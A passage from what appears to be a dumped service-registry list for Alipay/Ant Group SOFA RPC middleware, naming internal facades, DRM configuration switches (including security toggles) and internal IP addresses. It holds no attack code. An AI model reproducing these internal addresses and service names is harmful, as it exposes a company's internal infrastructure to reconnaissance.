m.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.pcald.common.service.facade.BalanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinquotationprod.common.service.falcon.facade.api.L2TrustTransactionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.file.FileQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amspm.insurance.service.repository.RuleDataRepositoryFacade:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.AdGdProfileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.89.157.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.arcore.common.service.facade.ArrangementOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.finpromo.FinpromprodConsultEquityService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.stopCheckTriggerAntqConsumer,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.accenter.service.query.api.AccenterBizProductQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspectprod.core.service.integration.file.oss.OssManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.126.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secuinfos.biz.shared.service.NewsInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.settlementprod.common.service.facade.api.CommissionBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secucommunity.common.service.facade.search.api.SearchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.SendWangWangService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcoop.common.service.facade.PcreditInstCloseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbshopdetail.facade.MerchantShopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.224.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincorecheck.common.service.facade.bizcheck.ChargeCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.biz.shared.event.handler.EventHandler:1.0:commodityMigrationToCloudTaskHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.cryptprod.common.service.facade.SignedServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.GroupFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.229.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.csbizcenter.facade.CityServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fincommontaskhub.backend.service.facade.ratelimit.RateLimitServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.config-security-false:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.featureEmptyEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.interaction.QuestionInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxposition.service.facade.ops.client.ifxposition.OpsIfxpositionClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbmemberprod.common.service.facade.api.tr.cg.UserCgTrOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seekers.facade.spis.EntityDiagnosisService:1.0:mobileha_fastReactionLocateService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.CertifyImportV2Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.MedicalContactService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaoprod.service.facade.api.AlipassSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.workflow.common.service.facade.api.tsd.TsdConversationAccountRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.235.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbservcenter.common.service.facade.job.JobUserLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_IINNERTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.clientgw.common.service.DispatchService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_ACCORDERCORE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreCzoneTairCache_dest.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.96.199#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insmobile.common.service.insure.facade.InsPlatformInsureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.api.TimeoutExecutor:1.0:mpafront@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterPortalRichTextFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.191.220#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudprovision:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappconfig.common.service.facade.api.JiuZhouManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.stresstestmng.bizservice.BackstageManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.api.AttachmentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dasbi.daas.api.table.process.ProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:orgPublish_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ichecker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundcardprod.common.service.fundcard.internal.DepositFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.marketing.facade.promotion.service.MarketingPromotionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.turnOffOldInvUser,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.message.MessageSubManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpInsttradeTairRz.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paygrowth.common.service.facade.task.TaskSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundboss.common.service.facade.risk.ChangeCheckCoverageConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbarcenter.common.service.facade.onlinetradepay.ArOnlineTradePayMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signExpireEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instradeprod.common.service.InsReserveFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mychain.gov.common.facade.api.NotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.gfsettleprod.facade.InvoiceInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:salesLeadsCompleteExcutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBackForLdc:1.0:filefactory@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.batchfund.common.service.facade.trans.api.BatchTransDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcreditcore.service.repayoldloan.PcreditRepayOldLoanApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.chatresource.drm.ChatResourceDRM.chatTabProductTypes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assettrans.facade.api.AssetTransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcsmart.biz.service.review.ReviewViewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_G_MOBILE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.Arch:name=com.alipay.pointprod.common.util.resource.PointProdOpsResource.batchAgentDispatchControl,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.155.246#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ordermng:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppprod.common.service.facade.recharge.RechargeRecordQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.GlobalMerchantService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.205.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfocore.core.repository.GroovyBeanRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.lifeprod.common.service.client.ComponentFunctionInvokeManager:1.0:secucommunity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bstsolprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.26.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.datacontext.common.service.facade.bizcontext.api.FcBizContextQueryService:1.0:fcdatacontext@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.function.FunctionBundleVerifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agds.sd.facade.service.AgdsProductEntryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.13.189.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.allowHostCompatibleLogList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:mrchiscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequote.api.L2TickQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditpledge.facade.PledgeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.56.231#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.routeclient.interfacename:pcreditsffweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.scheduler.route.RouteProxyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.definition.BizProcessQueryOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finprodcenter.common.service.facade.ProductAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.235#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rccenter.common.report.facade.disclose.RccenterDiscReportPrivFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.OdpsSearchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.cloudinc.core.dns.drm.DnsCommonDrmResource.viewMapping,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.gfas:name=com.alipay.accha.core.drm.FailoverSwitchDrmResource.failoverStatus2,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:alipay-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.profile.facade.LabelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.api.AntNewSearchServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.decision.DecisionConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:pcreditcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableVsar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_FINPWM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbomp.common.service.facade.sfs.SFSClientFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.174#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.26.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_PROMOCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cashier:name=com.alipay.cashier.common.service.integration.drm.resource.AntEventContextResource.fpSeniorCfg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfas.facade.api.RouteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.service.facade.api.showtemplate.ShowTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.marketpoint.api.MptransTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.test.facade.ShadowUserService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0:overseaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.hksite.facade.api.MerchantCrmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofamvc-cloud-test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.baitiaoprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mbill.common.service.facade.MbillSpecDataFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:libadtask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ebillcenter.common.service.facade.EbillBillkeyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.trade.TradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adc.schedule.facade.ScheduleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.card.api.SelectProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.TinyAppJsPermissionQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aistudio.facade.AiStudioModelMetaService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbclaimprod.common.service.facade.ClaimMetadataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:ROLE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.13.32.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.otp.common.service.facade.api.OtpManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.finfocore.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.clearingcenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.data.process.facade.search.CodeSearchService:1.0:data-process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.common.service.integration.drm.IntegrationMigrateDrm.custviewMigrateSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.OutCardBizDRM.blackBizSceneInString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dasbi.daas.api.query.metric.MetricQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.depositback.ManualDbackManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finslip.common.service.facade.notify.ManualInterveneCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcactivitycore.facade.cashbackcard.CashBackCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rdeclarecenter.biz.report.manager.FcUsersManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pfunddts.common.facade.api.ProblemTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromobus.common.service.facade.thirdparty.CategoryManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.183.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:afcgfcenter_workflowProcessCallbackxss3927test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.dk.DkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pre_auth_migration_service@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskportal.facade.yida.YidaGeneralIntentionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.metadata.common.service.rest.dm.RestDimensionalModelService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchdtunical.common.service.facade.DrcAutoSubsribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.LoggerDRM.fullChainLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:cstask_openAccountProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:iotface@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaascoreng.facade.ops.LogCleanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.poscoreTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.178.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache_dest.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.scheduler:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yebplus.common.facade.service.api.yebscene.query.YebcWinListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.govern.MrchGovernFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.service.BizScriptManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_instGuarArCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantAttachmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.opm.service.facade.cluster.ClusterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.service.BPService:1.0:antprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aclinkedcore.common.service.facade.PipelineBackStageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExClientSubAgreQueryFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphad.common.service.facade.project.api.IProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.picasso.common.service.facade.creative.CreativeSearch:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.72.143#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.tradeexprod:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableJdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcredittrans.facade.baopoint.api.BpctransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.cicada.facade.api.VoucherActivityModifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.common.service.facade.FundRiskModelingFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchanttrade.common.service.facade.api.RefundApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dasicube@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.service.facade.api.luckyfish.query.LuckyFishInstanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afts.common.service.facade.auth.AftsPermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antflow.common.service.facade.TodoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.191.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinquotationprod.common.service.facade.api.DividendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.antcloud.AntCloudPunishClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.mydds.biz.shared.decision.drm.SlsSwitchResource.switchOn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zdal.ldc.tair.bankcardTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_FDP_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:insmarketingbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.outbound.facade.SoftPhoneSdkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:accommodationDetailDownloadCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.logistic.credit.transfer.facade.CreditMonitorFacade:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amct.facade.RdcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.wealthasset.FaAssetTransCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.socialcore.facade.taskcenter.TaskApplyOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.customscenter:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antlink.tuling.common.service.api.gang.GangQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finriskmngcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexratecenter.core.service.syncdata.UsEastGlobalDataSyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.facade.api.monthlystatement.MonthlyCertificateQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityidentify.service.eworkcard.EworkCardUsableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOF